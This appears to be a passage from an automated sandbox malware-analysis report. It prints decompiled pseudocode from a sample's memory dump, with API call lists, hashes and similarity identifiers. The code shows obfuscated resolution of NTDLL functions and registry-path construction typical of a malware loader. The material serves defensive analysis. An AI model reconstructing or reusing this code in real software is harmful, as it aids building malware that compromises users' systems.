                                                                                                                                                                                                                        			E026F14E7(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                                        				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                        				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t54 = E026F6D10(0x20);
                                                                                                                                                                                                                        				if(_t54 == 0) {
                                                                                                                                                                                                                        					_v8 = 8;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t23 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t1 = _t23 + 0x26fe11a; // 0x4c44544e
                                                                                                                                                                                                                        					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                        					_t26 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t2 = _t26 + 0x26fe769; // 0x7243775a
                                                                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                                                                        					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                        					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                        					if(_t28 == 0) {
                                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                                        						E026F45B3(_t54);
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t30 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t5 = _t30 + 0x26fe756; // 0x614d775a
                                                                                                                                                                                                                        						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                        						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                                        							goto L8;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t33 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							_t7 = _t33 + 0x26fe40b; // 0x6e55775a
                                                                                                                                                                                                                        							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                        							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                        							if(_t35 == 0) {
                                                                                                                                                                                                                        								goto L8;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t36 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        								_t9 = _t36 + 0x26fe4d2; // 0x4e6c7452
                                                                                                                                                                                                                        								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                        								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                        								if(_t38 == 0) {
                                                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_t39 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        									_t11 = _t39 + 0x26fe779; // 0x6c43775a
                                                                                                                                                                                                                        									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                        									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                        									if(_t41 == 0) {
                                                                                                                                                                                                                        										goto L8;
                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                        										_t44 = E026F3FD7(_t54, _a8);
                                                                                                                                                                                                                        										_v8 = _t44;
                                                                                                                                                                                                                        										if(_t44 != 0) {
                                                                                                                                                                                                                        											goto L8;
                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                        											 *_a12 = _t54;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                        0x026f14f6
                                                                                                                                                                                                                        0x026f14fa
                                                                                                                                                                                                                        0x026f15bc
                                                                                                                                                                                                                        0x026f1500
                                                                                                                                                                                                                        0x026f1500
                                                                                                                                                                                                                        0x026f1505
                                                                                                                                                                                                                        0x026f1518
                                                                                                                                                                                                                        0x026f151a
                                                                                                                                                                                                                        0x026f151f
                                                                                                                                                                                                                        0x026f1527
                                                                                                                                                                                                                        0x026f152e
                                                                                                                                                                                                                        0x026f1530
                                                                                                                                                                                                                        0x026f1535
                                                                                                                                                                                                                        0x026f15b4
                                                                                                                                                                                                                        0x026f15b5
                                                                                                                                                                                                                        0x026f1537
                                                                                                                                                                                                                        0x026f1537
                                                                                                                                                                                                                        0x026f153c
                                                                                                                                                                                                                        0x026f1544
                                                                                                                                                                                                                        0x026f1546
                                                                                                                                                                                                                        0x026f154b
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f154d
                                                                                                                                                                                                                        0x026f154d
                                                                                                                                                                                                                        0x026f1552
                                                                                                                                                                                                                        0x026f155a
                                                                                                                                                                                                                        0x026f155c
                                                                                                                                                                                                                        0x026f1561
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f1563
                                                                                                                                                                                                                        0x026f1563
                                                                                                                                                                                                                        0x026f1568
                                                                                                                                                                                                                        0x026f1570
                                                                                                                                                                                                                        0x026f1572
                                                                                                                                                                                                                        0x026f1577
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f1579
                                                                                                                                                                                                                        0x026f1579
                                                                                                                                                                                                                        0x026f157e
                                                                                                                                                                                                                        0x026f1586
                                                                                                                                                                                                                        0x026f1588
                                                                                                                                                                                                                        0x026f158d
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f158f
                                                                                                                                                                                                                        0x026f1595
                                                                                                                                                                                                                        0x026f159a
                                                                                                                                                                                                                        0x026f15a1
                                                                                                                                                                                                                        0x026f15a6
                                                                                                                                                                                                                        0x026f15ab
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f15ad
                                                                                                                                                                                                                        0x026f15b0
                                                                                                                                                                                                                        0x026f15b0
                                                                                                                                                                                                                        0x026f15ab
                                                                                                                                                                                                                        0x026f158d
                                                                                                                                                                                                                        0x026f1577
                                                                                                                                                                                                                        0x026f1561
                                                                                                                                                                                                                        0x026f154b
                                                                                                                                                                                                                        0x026f1535
                                                                                                                                                                                                                        0x026f15ca

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,026F49D3,?,?,?,?,00000000,00000000), ref: 026F150C
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 026F152E
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 026F1544
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 026F155A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 026F1570
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 026F1586
                                                                                                                                                                                                                          • Part of subcall function 026F3FD7: memset.NTDLL ref: 026F4056
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1886625739-0
                                                                                                                                                                                                                        • Opcode ID: 6ab810ce03ed5d0a83d101ab87eff4c2be6688b2ae6d851a71f3328461db00b8
                                                                                                                                                                                                                        • Instruction ID: 1b466b1a397e4be14d384f00f732de73599bc67d38b321f2c74a09db68fb8984
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ab810ce03ed5d0a83d101ab87eff4c2be6688b2ae6d851a71f3328461db00b8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21D9B160064A9FDFA0EF69C984D5AB7ECEF15344701456AA70ACB321D770EA05CFA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                                        			E026F8C1A(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                        				signed int* _v16;
                                                                                                                                                                                                                        				void _v284;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				char* _t60;
                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                                                        				char _t68;
                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                                        				signed int* _t104;
                                                                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t97 = __ecx;
                                                                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        				_t102 = _a16;
                                                                                                                                                                                                                        				if(_t102 == 0) {
                                                                                                                                                                                                                        					__imp__( &_v284,  *0x26fd33c);
                                                                                                                                                                                                                        					_t96 = 0x80000002;
                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                        					_t60 = E026FA5A3(0,  &_v284);
                                                                                                                                                                                                                        					_a8 = _t60;
                                                                                                                                                                                                                        					if(_t60 == 0) {
                                                                                                                                                                                                                        						_v8 = 8;
                                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                                        						_t61 = _a20;
                                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                                        							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						return _v8;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t105 = _a24;
                                                                                                                                                                                                                        					if(E026F9135(_t97, _t105, _t96, _t60) != 0) {
                                                                                                                                                                                                                        						L27:
                                                                                                                                                                                                                        						E026F45B3(_a8);
                                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t65 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t16 = _t65 + 0x26fe8cb; // 0x65696c43
                                                                                                                                                                                                                        					_t68 = E026FA5A3(0, _t16);
                                                                                                                                                                                                                        					_a24 = _t68;
                                                                                                                                                                                                                        					if(_t68 == 0) {
                                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                                        						_t29 = _t105 + 0x14; // 0x102
                                                                                                                                                                                                                        						_t33 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        						if(E026F3D94( *_t33, _t96, _a8,  *0x26fd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                        							_t72 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							if(_t102 == 0) {
                                                                                                                                                                                                                        								_t35 = _t72 + 0x26fea42; // 0x4d4c4b48
                                                                                                                                                                                                                        								_t73 = _t35;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t34 = _t72 + 0x26fea3d; // 0x55434b48
                                                                                                                                                                                                                        								_t73 = _t34;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							if(E026F4118( &_a24, _t73,  *0x26fd334,  *0x26fd338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                        								if(_t102 == 0) {
                                                                                                                                                                                                                        									_t75 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        									_t44 = _t75 + 0x26fe856; // 0x74666f53
                                                                                                                                                                                                                        									_t78 = E026FA5A3(0, _t44);
                                                                                                                                                                                                                        									_t103 = _t78;
                                                                                                                                                                                                                        									if(_t78 == 0) {
                                                                                                                                                                                                                        										_v8 = 8;
                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                        										_t47 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        										E026F407F( *_t47, _t96, _a8,  *0x26fd338, _a24);
                                                                                                                                                                                                                        										_t49 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        										E026F407F( *_t49, _t96, _t103,  *0x26fd330, _a16);
                                                                                                                                                                                                                        										E026F45B3(_t103);
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_t40 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        									E026F407F( *_t40, _t96, _a8,  *0x26fd338, _a24);
                                                                                                                                                                                                                        									_t43 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        									E026F407F( *_t43, _t96, _a8,  *0x26fd330, _a16);
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								if( *_t105 != 0) {
                                                                                                                                                                                                                        									E026F45B3(_a24);
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									 *_t105 = _a16;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t21 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        					if(E026F424B( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                        						_t104 = _v16;
                                                                                                                                                                                                                        						_t88 = 0x28;
                                                                                                                                                                                                                        						if(_v12 == _t88) {
                                                                                                                                                                                                                        							 *_t104 =  *_t104 & 0x00000000;
                                                                                                                                                                                                                        							_t26 = _t105 + 0x10; // 0x3d026fc0
                                                                                                                                                                                                                        							E026F3D94( *_t26, _t96, _a8, _a24, _t104);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						E026F45B3(_t104);
                                                                                                                                                                                                                        						_t102 = _a16;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					E026F45B3(_a24);
                                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                        					goto L29;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					memcpy( &_v284, _a8, _t102);
                                                                                                                                                                                                                        					__imp__(_t106 + _t102 - 0x117,  *0x26fd33c);
                                                                                                                                                                                                                        					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                                                                                                                                                        					_t96 = 0x80000003;
                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}























                                                                                                                                                                                                                        0x026f8c1a
                                                                                                                                                                                                                        0x026f8c23
                                                                                                                                                                                                                        0x026f8c2a
                                                                                                                                                                                                                        0x026f8c2f
                                                                                                                                                                                                                        0x026f8c9e
                                                                                                                                                                                                                        0x026f8ca4
                                                                                                                                                                                                                        0x026f8ca9
                                                                                                                                                                                                                        0x026f8cb2
                                                                                                                                                                                                                        0x026f8cb7
                                                                                                                                                                                                                        0x026f8cbc
                                                                                                                                                                                                                        0x026f8e30
                                                                                                                                                                                                                        0x026f8e37
                                                                                                                                                                                                                        0x026f8e37
                                                                                                                                                                                                                        0x026f8e3c
                                                                                                                                                                                                                        0x026f8e3e
                                                                                                                                                                                                                        0x026f8e3e
                                                                                                                                                                                                                        0x026f8e47
                                                                                                                                                                                                                        0x026f8e47
                                                                                                                                                                                                                        0x026f8cc2
                                                                                                                                                                                                                        0x026f8cce
                                                                                                                                                                                                                        0x026f8e26
                                                                                                                                                                                                                        0x026f8e29
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8e29
                                                                                                                                                                                                                        0x026f8cd4
                                                                                                                                                                                                                        0x026f8cd9
                                                                                                                                                                                                                        0x026f8ce2
                                                                                                                                                                                                                        0x026f8ce7
                                                                                                                                                                                                                        0x026f8cec
                                                                                                                                                                                                                        0x026f8d36
                                                                                                                                                                                                                        0x026f8d36
                                                                                                                                                                                                                        0x026f8d49
                                                                                                                                                                                                                        0x026f8d53
                                                                                                                                                                                                                        0x026f8d59
                                                                                                                                                                                                                        0x026f8d60
                                                                                                                                                                                                                        0x026f8d6a
                                                                                                                                                                                                                        0x026f8d6a
                                                                                                                                                                                                                        0x026f8d62
                                                                                                                                                                                                                        0x026f8d62
                                                                                                                                                                                                                        0x026f8d62
                                                                                                                                                                                                                        0x026f8d62
                                                                                                                                                                                                                        0x026f8d8c
                                                                                                                                                                                                                        0x026f8d94
                                                                                                                                                                                                                        0x026f8dc2
                                                                                                                                                                                                                        0x026f8dc7
                                                                                                                                                                                                                        0x026f8dd0
                                                                                                                                                                                                                        0x026f8dd5
                                                                                                                                                                                                                        0x026f8dd9
                                                                                                                                                                                                                        0x026f8e0b
                                                                                                                                                                                                                        0x026f8ddb
                                                                                                                                                                                                                        0x026f8de8
                                                                                                                                                                                                                        0x026f8deb
                                                                                                                                                                                                                        0x026f8dfb
                                                                                                                                                                                                                        0x026f8dfe
                                                                                                                                                                                                                        0x026f8e04
                                                                                                                                                                                                                        0x026f8e04
                                                                                                                                                                                                                        0x026f8d96
                                                                                                                                                                                                                        0x026f8da3
                                                                                                                                                                                                                        0x026f8da6
                                                                                                                                                                                                                        0x026f8db8
                                                                                                                                                                                                                        0x026f8dbb
                                                                                                                                                                                                                        0x026f8dbb
                                                                                                                                                                                                                        0x026f8e15
                                                                                                                                                                                                                        0x026f8e21
                                                                                                                                                                                                                        0x026f8e17
                                                                                                                                                                                                                        0x026f8e1a
                                                                                                                                                                                                                        0x026f8e1a
                                                                                                                                                                                                                        0x026f8e15
                                                                                                                                                                                                                        0x026f8d8c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8d53
                                                                                                                                                                                                                        0x026f8cfb
                                                                                                                                                                                                                        0x026f8d05
                                                                                                                                                                                                                        0x026f8d07
                                                                                                                                                                                                                        0x026f8d0c
                                                                                                                                                                                                                        0x026f8d10
                                                                                                                                                                                                                        0x026f8d12
                                                                                                                                                                                                                        0x026f8d1d
                                                                                                                                                                                                                        0x026f8d20
                                                                                                                                                                                                                        0x026f8d20
                                                                                                                                                                                                                        0x026f8d26
                                                                                                                                                                                                                        0x026f8d2b
                                                                                                                                                                                                                        0x026f8d2b
                                                                                                                                                                                                                        0x026f8d31
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8d31
                                                                                                                                                                                                                        0x026f8c34
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8c5b
                                                                                                                                                                                                                        0x026f8c66
                                                                                                                                                                                                                        0x026f8c7c
                                                                                                                                                                                                                        0x026f8c82
                                                                                                                                                                                                                        0x026f8c8a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f8c8a

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • StrChrA.SHLWAPI(026F81E5,0000005F,00000000,00000000,00000104), ref: 026F8C4D
                                                                                                                                                                                                                        • memcpy.NTDLL(?,026F81E5,?), ref: 026F8C66
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?), ref: 026F8C7C
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: lstrlen.KERNEL32(?,00000000,026FD330,00000001,026F453C,026FD00C,026FD00C,00000000,00000005,00000000,00000000,?,?,?,026F857A,?), ref: 026FA5AC
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: mbstowcs.NTDLL ref: 026FA5D3
                                                                                                                                                                                                                          • Part of subcall function 026FA5A3: memset.NTDLL ref: 026FA5E5
                                                                                                                                                                                                                          • Part of subcall function 026F407F: lstrlenW.KERNEL32(026F81E5,?,?,026F8DF0,3D026FC0,80000002,026F81E5,026F82F9,74666F53,4D4C4B48,026F82F9,?,3D026FC0,80000002,026F81E5,?), ref: 026F409F
                                                                                                                                                                                                                          • Part of subcall function 026F45B3: HeapFree.KERNEL32(00000000,00000000,026F5DE9,00000000,?,?,-00000008), ref: 026F45BF
                                                                                                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 026F8C9E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                                                                                                                                                        • String ID: \
                                                                                                                                                                                                                        • API String ID: 2598994505-2967466578
                                                                                                                                                                                                                        • Opcode ID: b7a202c3c8a55bdbc6d18b1f4abe1c0d47e739a178f1d29ea6c51b7751ae6cd6
                                                                                                                                                                                                                        • Instruction ID: 302353ddea63030a598521f55138f704f68091cc728cc03abcf0b56e88b787f0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7a202c3c8a55bdbc6d18b1f4abe1c0d47e739a178f1d29ea6c51b7751ae6cd6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8512A7290020AEFDFA1AFA0DD45E9A7BBAEF04304F004558FB1597260EB35E965DF50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                        			E026F3970(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                        				char _t28;
                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                        				int _t51;
                                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t49 = _a4;
                                                                                                                                                                                                                        				_t55 = __eax;
                                                                                                                                                                                                                        				_v12 = 0xb;
                                                                                                                                                                                                                        				if(_t49 != 0 && __eax != 0) {
                                                                                                                                                                                                                        					_t5 = _t55 - 1; // -1
                                                                                                                                                                                                                        					_t42 = _t49 + _t5;
                                                                                                                                                                                                                        					_t28 =  *_t42;
                                                                                                                                                                                                                        					_v5 = _t28;
                                                                                                                                                                                                                        					 *_t42 = 0;
                                                                                                                                                                                                                        					__imp__(_a8, _t41);
                                                                                                                                                                                                                        					_v16 = _t28;
                                                                                                                                                                                                                        					_t50 =  *0x26fd114(_t49, _a8);
                                                                                                                                                                                                                        					if(_t50 != 0) {
                                                                                                                                                                                                                        						 *_t42 = _v5;
                                                                                                                                                                                                                        						_t44 = RtlAllocateHeap( *0x26fd238, 0, _a16 + __eax);
                                                                                                                                                                                                                        						if(_t44 == 0) {
                                                                                                                                                                                                                        							_v12 = 8;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t51 = _t50 - _a4;
                                                                                                                                                                                                                        							memcpy(_t44, _a4, _t51);
                                                                                                                                                                                                                        							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                                                                                                                                                        							_t45 = _v16;
                                                                                                                                                                                                                        							_t54 = _a16;
                                                                                                                                                                                                                        							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                                                                                                                                                        							 *_a20 = _t44;
                                                                                                                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                        							 *_a24 = _t55 - _v16 + _t54;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v12;
                                                                                                                                                                                                                        			}
















                                                                                                                                                                                                                        0x026f3978
                                                                                                                                                                                                                        0x026f397b
                                                                                                                                                                                                                        0x026f397d
                                                                                                                                                                                                                        0x026f3986
                                                                                                                                                                                                                        0x026f3998
                                                                                                                                                                                                                        0x026f3998
                                                                                                                                                                                                                        0x026f399c
                                                                                                                                                                                                                        0x026f399e
                                                                                                                                                                                                                        0x026f39a1
                                                                                                                                                                                                                        0x026f39a4
                                                                                                                                                                                                                        0x026f39ad
                                                                                                                                                                                                                        0x026f39b7
                                                                                                                                                                                                                        0x026f39bb
                                                                                                                                                                                                                        0x026f39c0
                                                                                                                                                                                                                        0x026f39d6
                                                                                                                                                                                                                        0x026f39da
                                                                                                                                                                                                                        0x026f3a2b
                                                                                                                                                                                                                        0x026f39dc
                                                                                                                                                                                                                        0x026f39dc
                                                                                                                                                                                                                        0x026f39e4
                                                                                                                                                                                                                        0x026f39f3
                                                                                                                                                                                                                        0x026f39f8
                                                                                                                                                                                                                        0x026f3a08
                                                                                                                                                                                                                        0x026f3a0e
                                                                                                                                                                                                                        0x026f3a19
                                                                                                                                                                                                                        0x026f3a23
                                                                                                                                                                                                                        0x026f3a27
                                                                                                                                                                                                                        0x026f3a27
                                                                                                                                                                                                                        0x026f39da
                                                                                                                                                                                                                        0x026f3a32
                                                                                                                                                                                                                        0x026f3a39

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 026F39A4
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 026F39D0
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 026F39E4
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 026F39F3
                                                                                                                                                                                                                        • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 026F3A0E
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1819133394-0
                                                                                                                                                                                                                        • Opcode ID: d2c4875d4fb693983c357a204a0f7c698230665bd373e5dea1adcf52cfd27ffc
                                                                                                                                                                                                                        • Instruction ID: ae24a19c49df513f630c117232f3d63f4a33630d3d4ce65390902ce68ac6b375
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c4875d4fb693983c357a204a0f7c698230665bd373e5dea1adcf52cfd27ffc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE219036900289BFCF019FA9C845A9EBF79EF85704F058055ED44AB304C731E965CBA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                        			E026F3F5E(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				long _t10;
